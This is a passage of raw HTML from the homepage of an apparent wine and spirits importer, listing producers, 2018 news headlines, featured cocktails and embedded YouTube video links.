href="http://domaineselect.com/producer/montanaro/">Montanaro</a></li> <li><a href="http://domaineselect.com/producer/movia/">Movia</a></li> <li><a href="http://domaineselect.com/producer/ishioka/">Murasaki No Mine</a></li> <li><a href="http://domaineselect.com/producer/nine-leaves/">Nine Leaves</a></li> <li><a href="http://domaineselect.com/producer/nobushi/">Nobushi</a></li> <li><a href="http://domaineselect.com/producer/ognissole/">Ognissole</a></li> <li><a href="http://domaineselect.com/producer/omar/">Omar</a></li> <li><a href="http://domaineselect.com/producer/ottos-athens-vermouth/">Otto's Athens Vermouth</a></li> <li><a href="http://domaineselect.com/producer/paltrinieri/">Paltrinieri</a></li> <li><a href="http://domaineselect.com/producer/paul-john/">Paul John</a></li> <li><a href="http://domaineselect.com/producer/payana/">Payana</a></li> <li><a href="http://domaineselect.com/producer/peter-jakob-kuhn/">Peter Jakob-Kühn</a></li> <li><a href="http://domaineselect.com/producer/poderi-dal-nespoli/">Poderi dal Nespoli</a></li> <li><a href="http://domaineselect.com/producer/poland-select-wodka/">Poland Select Wodka</a></li> <li><a href="http://domaineselect.com/producer/primaterra/">Primaterra</a></li> <li><a href="http://domaineselect.com/producer/quattro-mani/">Quattro Mani</a></li> <li><a href="http://domaineselect.com/producer/ranger-creek/">Ranger Creek</a></li> <li><a href="http://domaineselect.com/producer/remirez-de-ganuza/">Remírez de Ganuza</a></li> <li><a href="http://domaineselect.com/producer/retour/">Retour</a></li> <li><a href="http://domaineselect.com/producer/ron-prohibido/">Ron Prohibido</a></li> <li><a href="http://domaineselect.com/producer/san-romano/">San Romano</a></li> <li><a href="http://domaineselect.com/producer/santa-vittoria/">Santa Vittoria</a></li> <li><a href="http://domaineselect.com/producer/serafini-vidotto/">Serafini & Vidotto</a></li> <li><a href="http://domaineselect.com/producer/skinos/">Skinos</a></li> <li><a href="http://domaineselect.com/producer/soleto/">Soleto</a></li> <li><a href="http://domaineselect.com/producer/storybook-mountain-vineyards/">Storybook Mountain Vineyards</a></li> <li><a href="http://domaineselect.com/producer/szepsy/">Szepsy</a></li> <li><a href="http://domaineselect.com/producer/tabarrini/">Tabarrini</a></li> <li><a href="http://domaineselect.com/producer/takijiman-shuzo/">Takijiman</a></li> <li><a href="http://domaineselect.com/producer/tenuta-di-valgiano/">Tenuta di Valgiano</a></li> <li><a href="http://domaineselect.com/producer/the-dead-rabbit/">The Dead Rabbit</a></li> <li><a href="http://domaineselect.com/producer/thomas-dakin/">Thomas Dakin</a></li> <li><a href="http://domaineselect.com/producer/tiano-nareno/">Tiano & Nareno</a></li> <li><a href="http://domaineselect.com/producer/vaca-das-cordas/">Vaca das Cordas</a></li> <li><a href="http://domaineselect.com/producer/varnelli/">Varnelli</a></li> <li><a href="http://domaineselect.com/producer/vaughn-duffy-wines/">Vaughn Duffy Wines</a></li> <li><a href="http://domaineselect.com/producer/velenosi/">Velenosi</a></li> <li><a href="http://domaineselect.com/producer/vinas-del-sol/">Viñas del Sol</a></li> <li><a href="http://domaineselect.com/producer/vocal-vineyards-2/">Vocal Vineyards</a></li> <li><a href="http://domaineselect.com/producer/huisui-shuzo/">Yamahai</a></li> <li><a href="http://domaineselect.com/producer/yarra-yering/">Yarra Yering</a></li> <li><a href="http://domaineselect.com/producer/yoho-brewery/">Yoho Beer</a></li> <li><a href="http://domaineselect.com/producer/tsukinowa-shuzo/">Yoi no Tsuki</a></li> <li><a href="http://domaineselect.com/producer/zabov/">Zabov</a></li> </ul> </li> <li><span class="main_category"><a href="http://domaineselect.com/japanese/" target="_blank"> Japanese Portfolio</a></span> <ul class="manufacturer"> <li><a href="http://domaineselect.com/producer/atago/">Atago</a></li> <li><a href="http://domaineselect.com/producer/hananomai-shuzo/">Hananomai</a></li> <li><a href="http://domaineselect.com/producer/kawacho/">Kawacho</a></li> <li><a href="http://domaineselect.com/producer/kembishi/">Kenbishi</a></li> <li><a href="http://domaineselect.com/producer/kurosawa-shuzo/">Kurosawa</a></li> <li><a href="http://domaineselect.com/producer/obata-shuzo/">Manotsuru</a></li> <li><a href="http://domaineselect.com/producer/nagai/">Mizbasho</a></li> <li><a href="http://domaineselect.com/producer/ishioka/">Murasaki No Mine</a></li> <li><a href="http://domaineselect.com/producer/takijiman-shuzo/">Takijiman</a></li> <li><a href="http://domaineselect.com/producer/huisui-shuzo/">Yamahai</a></li> <li><a href="http://domaineselect.com/producer/yoho-brewery/">Yoho Beer</a></li> <li><a href="http://domaineselect.com/producer/tsukinowa-shuzo/">Yoi no Tsuki</a></li> </ul> </li> </ul> --> <!-- <div class="nav_search"> <form> <fieldset> <input class="input_nav_search" placeholder="Search" value="" type="text" /> <button class="btn_nav_search">search</button> </fieldset> </form> </div> --> </div> </div> </div> <div class="bar"> <div class="container clearfix"> <div class="right-bar"> <div id="widget-area" class="widget-area" role="complementary"> <aside id="search-3" class="widget search widget_search"><form role="search" method="get" class="search-form" action="http://domaineselect.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </label> <input type="submit" class="search-submit screen-reader-text" value="Search" /> </form></aside><aside id="text-2" class="widget search widget_text"> <div class="textwidget"> <div class="social"> <a class="social_btn_facebook" href="https://www.facebook.com/DomaineSelect" target="_blank"><i class="ic ic-facebook"></i></a> <a class="social_btn_twitter" href="https://twitter.com/domaineselect" target="_blank"><i class="ic ic-twitter"></i></a> <a class="social_btn_instagram" href="https://instagram.com/domaineselect/" target="_blank"><i class="ic ic-instagramm"></i></a> <a href="https://www.pinterest.com/domaineselect/" target="_blank"><i class="ic ic-pinterest"></i></a> <a class="social_btn_storify" href="https://storify.com/domaineselect/" target="_blank"><i class="ic ic-storify"></i></a> <a class="social_btn_youtube" href="https://www.youtube.com/user/DomaineSelect" target="_blank"><i class="ic ic-youtube"></i></a> </div></div> </aside> </div><!-- .widget-area --> </div> <div class="newsticker"> <strong>News</strong> <div id="mtphr-dnt-241" class="mtphr-dnt mtphr-dnt-241 mtphr-dnt-default mtphr-dnt-scroll mtphr-dnt-scroll-left"><div class="mtphr-dnt-wrapper mtphr-dnt-clearfix"><div class="mtphr-dnt-tick-container"><div class="mtphr-dnt-tick-contents"></div></div></div></div> </div> </div> </div> <style type="text/css"> .popup_nav_box { left:405px; width: 220px; } .popup_nav_box ul { display: inline; } .popup_nav_box ul li { display:block; } .merchants_popup_nav_box { left:610px; width: 220px; } .merchants_popup_nav_box ul{ display: inline; } .merchants_popup_nav_box ul li{ display:block; } #nav a.btn_import_portfolio { height: 100%; } </style> <div class="wa_rs_relative_container top_slider"><div class="wa_rs_buttons"><a class="wa_rs_slide_nav" id="wa_rs_prev"><i class="fa fa-chevron-left"></i></a><a class="wa_rs_slide_nav" id="wa_rs_next"><i class="fa fa-chevron-right"></i></a></div><div href="javascript:void(0)" class="wa_rs_nav" id="wa_rs_nav"></div><ul id="wa_rs_cycle"><li><img width="1200" height="400" src="http://domaineselect.com/wp-content/uploads/2015/09/MIRAFIORE-CELLAR-the-cellar-of-the-king1-1200x400.jpg" class="attachment-wa_rs_slider_image wp-post-image" alt="MIRAFIORE CELLAR - the cellar of the king" /><div class="bottom" style="color:rgb(248, 242, 242); background:rgba(0, 0, 0, 0);"><h3 style="color:rgb(248, 242, 242) !important; opacity: 1;">DIVERSITY CHARACTER EXPRESSION TRADITION</h3></div></li><li><img width="1200" height="400" src="http://domaineselect.com/wp-content/uploads/2015/08/tworivers7-1200x400.jpg" class="attachment-wa_rs_slider_image wp-post-image" alt="tworivers7" /><div class="left" style="color:rgba(0, 0, 0, 0); background:rgba(0, 0, 0, 0);"><h3 style="color:rgba(0, 0, 0, 0) !important; opacity: 1;"></h3></div></li><li><img width="1200" height="400" src="http://domaineselect.com/wp-content/uploads/2015/08/collemassari063-1200x400.jpg" class="attachment-wa_rs_slider_image wp-post-image" alt="_collemassari063" /><div class="hidden" style="color:rgba(0, 0, 0, 0); background:rgba(0, 0, 0, 0);"><h3 style="color:rgba(0, 0, 0, 0) !important; opacity: 1;"></h3></div></li><li><img width="1200" height="400" src="http://domaineselect.com/wp-content/uploads/2015/08/dupont-b55-3001-1200x400.jpg" class="attachment-wa_rs_slider_image wp-post-image" alt="dupont-b55-300" /><div class="bottom" style="color:rgb(241, 230, 230); background:rgba(250, 246, 246, 0);"><h3 style="color:rgb(241, 230, 230) !important; opacity: 1;"></h3></div></li></ul></div><div id="main" class="hfeed site"> <div class="container clearfix"> <div class="row"> <div class="big-col"> <div class="latest-news"> <div class="home_title_box"> <strong class="btn_open_all"><a href="http://domaineselect.com/latest-news/">open all</a></strong> <div class="title_bg"> <strong class="title">Latest News</strong> </div> </div> <div class="box_latest_news"> <div class="left_news"> <div class="blogpost-thumb"> <div class="post-thumbnail"> <img width="727" height="269" src="http://domaineselect.com/wp-content/uploads/2018/06/Atlantico-Rum-727x269.jpg" class="attachment-post-thumbnail wp-post-image" alt="Atlantico Rum" /> </div><!-- .post-thumbnail --> </div> <div class="post-content"> <div class="post-title"><h3><a href="http://domaineselect.com/domaine-select-acquires-super-premium-rum-brand-atlantico/">Domaine Select Acquires Super-Premium Rum Brand Atlántico</a></h3></div> <div class="post-info">July 3, 2018</div> </div> </div> <div class="right_news"> <div class="blogpost"> <div class="blogpost-thumb"><img width="100" height="100" src="http://domaineselect.com/wp-content/uploads/2018/06/Atlantico-Rum-100x100.jpg" class="attachment-thumbnail wp-post-image" alt="Atlantico Rum" /></div> <div class="post-content"> <div class="post-title"><h3><a href="http://domaineselect.com/domaine-select-acquires-super-premium-rum-brand-atlantico/">Domaine Select Acquires Super-Premium Rum Brand Atlántico</a></h3></div> <div class="post-info"> <span class="post-date">July 3, 2018</span></div> </div> </div> <div class="blogpost"> <div class="blogpost-thumb"></div> <div class="post-content"> <div class="post-title"><h3><a href="http://domaineselect.com/the-five-best-experiences-from-drink-miami-hostel-2018/">The Five Best Experiences From Drink Miami Hostel 2018</a></h3></div> <div class="post-info"> <span class="post-date">June 5, 2018</span></div> </div> </div> <div class="blogpost"> <div class="blogpost-thumb"><img width="100" height="100" src="http://domaineselect.com/wp-content/uploads/2018/04/Screen-Shot-2018-04-30-at-11.25.07-AM-100x100.png" class="attachment-thumbnail wp-post-image" alt="Screen Shot 2018-04-30 at 11.25.07 AM" /></div> <div class="post-content"> <div class="post-title"><h3><a href="http://domaineselect.com/black-cottage-2017-marlborough-sauvignon-blanc-top-100-values-of-2018/">Black Cottage 2017 Marlborough Sauvignon Blanc Top 100 Values of 2018</a></h3></div> <div class="post-info"> <span class="post-date">April 30, 2018</span></div> </div> </div> <div class="blogpost"> <div class="blogpost-thumb"><img width="100" height="100" src="http://domaineselect.com/wp-content/uploads/2018/04/EG_Elephants-Gin-Ol-Donyo_2017-e1509622511435-100x100.jpg" class="attachment-thumbnail wp-post-image" alt="EG_Elephants-Gin-Ol-Donyo_2017-e1509622511435" /></div> <div class="post-content"> <div class="post-title"><h3><a href="http://domaineselect.com/elephant-gin-to-launch-in-the-us-in-2018/">Elephant Gin to Launch in the US in 2018</a></h3></div> <div class="post-info"> <span class="post-date">April 26, 2018</span></div> </div> </div> <div class="blogpost"> <div class="blogpost-thumb"><img width="100" height="100" src="http://domaineselect.com/wp-content/uploads/2018/03/kpj-100x100.png" class="attachment-thumbnail wp-post-image" alt="kpj" /></div> <div class="post-content"> <div class="post-title"><h3><a href="http://domaineselect.com/the-indian-whisky-you-should-add-to-your-bar-cart/">The Indian Whisky You Should Add to Your Bar Cart</a></h3></div> <div class="post-info"> <span class="post-date">March 23, 2018</span></div> </div> </div> </div> </div> </div> <div class="recipes_holder"> <div class="home_title_box"> <strong class="btn_open_all"><a href="http://domaineselect.com/featured-cocktails/">open all</a></strong> <div class="title_bg"> <strong class="title">Featured Cocktails</strong> </div> </div> <div class="recipes_box"> <div class="blogpost"> <div class="post-thumbnail"> <img width="375" height="225" src="http://domaineselect.com/wp-content/uploads/2018/08/Fools-Ransom.jpeg" class="attachment-post-thumbnail wp-post-image" alt="Fool&#039;s Ransom" /> </div><!-- .post-thumbnail --> <div class="post-content"> <div class="post-title"><h3><a href="http://domaineselect.com/recipes/fools-ransom/">Fool’s Ransom</a></h3></div> <div class="post-info"><span class="post-date">September 5, 2018</span></div> </div> </div> <div class="blogpost"> <div class="post-thumbnail"> <img width="405" height="225" src="http://domaineselect.com/wp-content/uploads/2018/08/Daq-and-Coke.jpeg" class="attachment-post-thumbnail wp-post-image" alt="Daq and Coke" /> </div><!-- .post-thumbnail --> <div class="post-content"> <div class="post-title"><h3><a href="http://domaineselect.com/recipes/daq-and-coke/">Daq and Coke</a></h3></div> <div class="post-info"><span class="post-date">September 5, 2018</span></div> </div> </div> </div> </div> <div class="latest-videos"> <div class="home_title_box"> <strong class="btn_open_all"><a href="http://domaineselect.com/latest-videos/">open all</a></strong> <div class="title_bg"> <div class="main_video_btn"> <a href="#" class="btn_prev"></a> <a href="#" class="btn_next"></a> </div> <strong class="title">Latest Videos</strong> </div> </div> <div id="main_video"> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/SK1yAoQLJFU?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2018/05/Screen-Shot-2018-05-10-at-3.05.09-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2018-05-10 at 3.05.09 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/C1xjM_MOkFs?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2018/04/Screen-Shot-2018-04-30-at-10.49.00-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2018-04-30 at 10.49.00 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/7shIZHIkHEU?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2018/02/Screen-Shot-2018-02-21-at-10.13.17-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2018-02-21 at 10.13.17 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/W1SpXEFRy0w?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2018/02/Screen-Shot-2018-02-21-at-9.56.45-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2018-02-21 at 9.56.45 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/a8FnBlVFhiU?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2017/12/Screen-Shot-2017-12-07-at-12.26.26-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2017-12-07 at 12.26.26 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/Vxr742jPskU?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2017/11/Screen-Shot-2017-11-30-at-4.57.05-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2017-11-30 at 4.57.05 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed//U42s9-F6SFo?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2017/10/Screen-Shot-2017-10-31-at-10.19.55-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2017-10-31 at 10.19.55 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/_lY9b73puc0?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2017/05/IMG_1194-220x130.jpg" class="attachment-video_images wp-post-image" alt="IMG_1194" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/CUOHli5bJnY?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2017/05/Screen-Shot-2017-05-08-at-12.21.26-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2017-05-08 at 12.21.26 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/5OUHvcogmso?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/OAazKHAa_6c?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2017/02/Screen-Shot-2017-02-13-at-4.27.38-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2017-02-13 at 4.27.38 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/CN355BxUqyM?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2017/02/Screen-Shot-2017-02-10-at-11.54.01-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2017-02-10 at 11.54.01 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/xmNevhKgy64?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2017/02/Screen-Shot-2017-02-08-at-11.37.03-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2017-02-08 at 11.37.03 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/iicvX9dIlSM?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2016/12/Screen-Shot-2016-12-14-at-9.29.49-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2016-12-14 at 9.29.49 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/dbsROuBN6Iw?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/-n30rXIgwVM?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/lCGrwjeHGfY?list=PLFVv80RKtsuYvfvoCRq_4POj0x_HKPm28?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2016/08/paolo-220x130.png" class="attachment-video_images wp-post-image" alt="paolo" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/PKRL6Vn_CLU?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/Pgt9Xvk0ySY?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2016/08/Screen-Shot-2016-08-01-at-5.35.17-PM-220x130.png" class="attachment-video_images wp-post-image" alt="World needs more diplomats" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/jcgoR2tI3BQ?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2016/05/Screen-Shot-2016-05-02-at-9.39.29-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2016-05-02 at 9.39.29 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/Ph3ACyU2VF4?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/LT1HoQYecnc?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/06/Screen-Shot-2015-06-18-at-10.43.35-AM3-220x130.png" class="attachment-video_images wp-post-image" alt="Screen-Shot-2015-06-18-at-10.43.35-AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/i0bj2Op6i8k?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2016/03/zoom_joblot_vineyards-220x130.jpg" class="attachment-video_images wp-post-image" alt="zoom_joblot_vineyards" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/nCYlkd9ZLuA?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/11/IMG_3839-1-220x130.jpg" class="attachment-video_images wp-post-image" alt="IMG_3839 1" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/n2vxQz-IG7A?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/sAeCUZg_XYU?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/10/Screen-Shot-2015-10-20-at-11.16.20-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Amaro dell&#039;Erborista (video image)" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/UgC6chew7K4?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/10/Screen-Shot-2015-10-08-at-9.47.52-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-10-08 at 9.47.52 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/XELIHanOmxo?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/10/Screen-Shot-2015-10-07-at-4.19.32-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-10-07 at 4.19.32 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/yY1RKnJCSEs?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/10/Screen-Shot-2015-10-05-at-1.55.55-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-10-05 at 1.55.55 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/cwOm32zva2M?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/10/Screen-Shot-2015-10-01-at-9.55.27-AM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-10-01 at 9.55.27 AM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/nKrwJYHntPg?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/mW7jAtORk3M?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/RTG_hmbjNRQ?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/yKbUXkc8mHw?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/09/Screen-Shot-2015-09-09-at-12.21.22-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-09-09 at 12.21.22 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/rEXSoKo65rQ?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/09/Screen-Shot-2015-09-09-at-12.14.46-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-09-09 at 12.14.46 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/xrCzamL32qo?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/09/Screen-Shot-2015-09-09-at-12.10.16-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-09-09 at 12.10.16 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/QwJi-lZQ43E?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/09/Screen-Shot-2015-09-09-at-12.03.42-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-09-09 at 12.03.42 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/bUp0X2h2k_g?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/vDhvK7PPqDo?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/gsuX6Hwrntg?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/GV7ALOCH5ZU?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/mN_pmY8gjCQ?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/hsyV4jcaVnU?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/p2P6E0956Q0?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/hPmSLMieX00?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/08/Screen-Shot-2015-08-05-at-2.56.18-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-08-05 at 2.56.18 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/ZpSrhHilH48?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/08/Screen-Shot-2015-08-05-at-2.52.51-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-08-05 at 2.52.51 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/iK989DjZr3g?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/PnxFvCKJMos?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/08/Screen-Shot-2015-08-05-at-2.28.22-PM-220x130.png" class="attachment-video_images wp-post-image" alt="Screen Shot 2015-08-05 at 2.28.22 PM" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/Fehs-0zgUs0?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/nagai-sake-220x130.png" class="attachment-video_images wp-post-image" alt="nagai sake" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/YOp9lOyjgsQ?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/obata-shuzo-220x130.png" class="attachment-video_images wp-post-image" alt="obata shuzo" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/LWgcgsqJsYY?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/kenbishi-220x130.png" class="attachment-video_images wp-post-image" alt="Kenbishi" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/sSAcJN1YYc4?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/biondi-santi-220x130.png" class="attachment-video_images wp-post-image" alt="biondi santi" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/IhJcZTixZvw?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/gravner-220x130.png" class="attachment-video_images wp-post-image" alt="gravner" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/rTLAH9yc8aM?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/cupano-220x130.png" class="attachment-video_images wp-post-image" alt="cupano" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/rxMvaSvlfEM?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/zGevYzALELs?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/BRnp37vmKuo?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/Fyiqu7EUQks?autoplay=1"> <span class="bg_video_btn"></span> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/95hKPrXqIDA?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/wp-220x130.png" class="attachment-video_images wp-post-image" alt="wp" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/egdRV387Xng?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/tuthilltown-220x130.png" class="attachment-video_images wp-post-image" alt="tuthilltown" /> </a> </div> <div class="item"> <a class="various iframe" href="http://www.youtube.com/embed/Zvd3ADpgwEE?autoplay=1"> <span class="bg_video_btn"></span> <img width="220" height="130" src="http://domaineselect.com/wp-content/uploads/2015/07/Screen-Shot-2015-07-28-at-4.41.01-PM-220x130.png" class="attachment-video_images wp-post-image" alt="keller" 